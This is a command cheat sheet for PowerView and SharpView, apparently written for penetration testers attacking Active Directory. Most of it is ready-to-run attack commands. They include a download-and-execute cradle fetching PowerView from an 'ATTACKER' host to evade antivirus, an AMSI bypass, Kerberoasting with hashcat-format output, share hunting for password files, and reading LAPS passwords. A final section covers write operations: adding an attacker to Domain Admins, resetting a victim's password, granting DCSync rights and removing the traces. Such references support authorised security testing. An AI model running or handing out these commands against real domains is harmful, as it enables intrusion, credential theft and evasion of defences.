PowerView / SharpView
PowerView and SharpView complete command reference: domain/user/group/computer/GPO/trust/ACL enumeration, Kerberoast and ASREP targets, delegation discovery, LAPS, share hunting, local admin discovery, and offensive write operations.
PowerView (PowerSploit) is the standard PowerShell AD enumeration library. SharpView is a C# port that works when PowerShell is restricted. Almost every BloodHound attack path needs PowerView to actually execute it.
Load PowerView
# From disk
Import-Module C:\Tools\PowerView.ps1
# From memory (bypass disk-based AV)
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/PowerView.ps1')
# Bypass execution policy
powershell -ep bypass -c "Import-Module .\PowerView.ps1; Get-DomainUser"
# AMSI bypass first (run before importing)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Import-Module .\PowerView.ps1# SharpView — no PowerShell required
.\SharpView.exe Get-DomainUser -Identity administrator
.\SharpView.exe Find-LocalAdminAccessDomain / Forest Enumeration
# Current domain info and SID
Get-Domain
Get-DomainSID
# Domain controllers
Get-DomainController
Get-DomainController -Domain child.corp.local
# Forest info and global catalog
Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog
# Password policy (lockout threshold, min length)
Get-DomainPolicy
(Get-DomainPolicy).'system access'
# Domain trusts
Get-DomainTrust
Get-DomainTrust -Domain child.corp.local
Get-ForestTrust
Get-DomainTrustMapping # recursive — maps all trustsUser Enumeration
# All users
Get-DomainUser | select samaccountname
# Specific user — full attributes
Get-DomainUser -Identity jsmith -Properties *
# Kerberoastable (have SPN, enabled)
Get-DomainUser -SPN | select samaccountname, serviceprincipalname
# AS-REP roastable (pre-auth disabled)
Get-DomainUser -KerberosPreauthNotRequired | select samaccountname
# Users with passwords in description / info (legacy misconfig)
Get-DomainUser | Where { $_.description -ne $null } | select samaccountname, description
Get-DomainUser | Where { $_.info -ne $null } | select samaccountname, info
# Privileged accounts (AdminCount=1)
Get-DomainUser -AdminCount | select samaccountname
# Disabled accounts
Get-DomainUser -UACFilter ACCOUNTDISABLE | select samaccountname
# Accounts with no password required
Get-DomainUser -UACFilter PASSWD_NOTREQD | select samaccountname
# Accounts never requiring password expiry
Get-DomainUser -UACFilter DONT_EXPIRE_PASSWORD | select samaccountnameGroup Enumeration
# All groups
Get-DomainGroup | select name
# Members of a group (recursive)
Get-DomainGroupMember -Identity 'Domain Admins' -Recurse
Get-DomainGroupMember -Identity 'Enterprise Admins' -Recurse
# All groups a user is member of
Get-DomainGroup -UserName jsmith | select name
# Privileged groups (AdminCount=1)
Get-DomainGroup -AdminCount | select name
# Local groups on a remote machine
Get-NetLocalGroup -ComputerName TARGET
Get-NetLocalGroupMember -ComputerName TARGET -GroupName AdministratorsComputer Enumeration
# All computers
Get-DomainComputer | select dnshostname, operatingsystem
# Windows Servers only
Get-DomainComputer -OperatingSystem '*Server*' | select dnshostname, operatingsystem
# Unconstrained delegation computers (escalation targets)
Get-DomainComputer -Unconstrained | select dnshostname
# Constrained delegation computers
Get-DomainComputer -TrustedToAuth | select dnshostname, 'msds-allowedtodelegateto'
# Computers in a specific OU
Get-DomainComputer -SearchBase "OU=Servers,DC=corp,DC=local"
# Ping alive hosts
Get-DomainComputer -Ping | select dnshostnameGPO Enumeration
# All GPOs
Get-DomainGPO | select displayname, gpcfilesyspath
# GPOs applied to a specific computer
Get-DomainGPO -ComputerIdentity WKSTN01 | select displayname
# GPOs that add users as local admin
Get-DomainGPOLocalGroup | select GPODisplayName, GroupMember
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity WKSTN01
# OUs and linked GPOs
Get-DomainOU | select name, gplinkACL / DACL Enumeration
# ACEs on a specific object
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs
# Find all objects where attacker has interesting rights
$sid = (Get-DomainUser -Identity attacker).objectsid
Get-DomainObjectAcl -ResolveGUIDs |
Where { $_.SecurityIdentifier -eq $sid } |
Select ObjectDN, ActiveDirectoryRights
# Find all GenericAll across domain
Get-DomainObjectAcl -ResolveGUIDs |
Where { $_.ActiveDirectoryRights -match "GenericAll" } |
Select ObjectDN, IdentityReference
# Find WriteDACL rights
Get-DomainObjectAcl -ResolveGUIDs |
Where { $_.ActiveDirectoryRights -match "WriteDacl" } |
Select ObjectDN, IdentityReference
# Check domain object for DCSync rights (DS-Replication-Get-Changes)
Get-DomainObjectAcl -Identity 'DC=corp,DC=local' -ResolveGUIDs |
Where { $_.ActiveDirectoryRights -match "Replicating|GenericAll|WriteDacl" }Share / File Enumeration
# Shares on a specific host
Get-NetShare -ComputerName TARGET
# Find accessible shares across domain (uses current user creds)
Find-DomainShare -CheckShareAccess
# Hunt for interesting files in readable shares
Find-InterestingDomainShareFile -Include "*.config","*.xml","password*","cred*","*.kdbx","*.pfx"
# Files modified recently
Find-InterestingDomainShareFile -LastAccessTime (Get-Date).AddDays(-14)Session / Logged-On User Discovery
# Who is logged onto a host right now
Get-NetLoggedon -ComputerName TARGET
Get-NetSession -ComputerName TARGET
# Find which hosts a user is logged into across the domain
Find-DomainUserLocation -UserIdentity administrator -Verbose
# Find hosts with domain admins logged in
Find-DomainUserLocation -GroupIdentity 'Domain Admins' -VerboseLocal Admin Discovery
# Find hosts where current credential has local admin (noisy)
Find-LocalAdminAccess -Verbose
# Test admin to a specific host
Test-AdminAccess -ComputerName TARGET
# Hosts where a group has local admin via GPO
Find-DomainLocalGroupMember -GroupName AdministratorsDelegation Discovery
# Unconstrained delegation (users and computers)
Get-DomainUser -Unconstrained | select samaccountname
Get-DomainComputer -Unconstrained | select dnshostname
# Constrained delegation — check allowed services
Get-DomainUser -TrustedToAuth | select samaccountname, 'msds-allowedtodelegateto'
Get-DomainComputer -TrustedToAuth | select dnshostname, 'msds-allowedtodelegateto'
# RBCD — msDS-AllowedToActOnBehalfOfOtherIdentity set on computers
Get-DomainComputer | Where { $_.'msds-allowedtoactonbehalfofotheridentity' -ne $null } |
select dnshostname, 'msds-allowedtoactonbehalfofotheridentity'SPN / Kerberoast
# Enumerate all SPNs
Get-DomainUser -SPN | select samaccountname, serviceprincipalname
# Request and output TGS hashes (hashcat format)
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File tgs.txt -Encoding ASCII
# Set SPN on account you control with GenericWrite
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/host.corp.local'}
Invoke-Kerberoast -Identity victim -OutputFormat Hashcat
# Clear SPN after cracking
Set-DomainObject -Identity victim -Clear serviceprincipalnameLAPS
# Check if LAPS is deployed
Get-DomainComputer | Where { $_.'ms-Mcs-AdmPwdExpirationTime' -ne $null } | select dnshostname
# Read LAPS passwords (requires AllExtendedRights or explicit read on ms-Mcs-AdmPwd)
Get-DomainComputer | select dnshostname, 'ms-mcs-admpwd', 'ms-mcs-admpwdexpirationtime'
Get-AdmPwdPassword -ComputerName TARGET # LAPS PowerShell moduleOffensive Write Operations
# Add user to group (AddMember or GenericAll on group)
Add-DomainGroupMember -Identity 'Domain Admins' -Members attacker
# Change user's password (ForceChangePassword / GenericAll on user)
Set-DomainUserPassword -Identity victim -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)
# Modify object attribute (GenericWrite)
Set-DomainObject -Identity victim -Set @{description='pwned'}
# Take ownership of an object (WriteOwner)
Set-DomainObjectOwner -Identity victim -OwnerIdentity attacker
# Grant yourself DCSync rights (WriteDACL on domain object)
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' -PrincipalIdentity attacker -Rights DCSync
# Grant full control over an object (WriteDACL)
Add-DomainObjectAcl -TargetIdentity victim -PrincipalIdentity attacker -Rights All
# Clean up — remove the ACE after use
Remove-DomainObjectAcl -TargetIdentity victim -PrincipalIdentity attacker -Rights All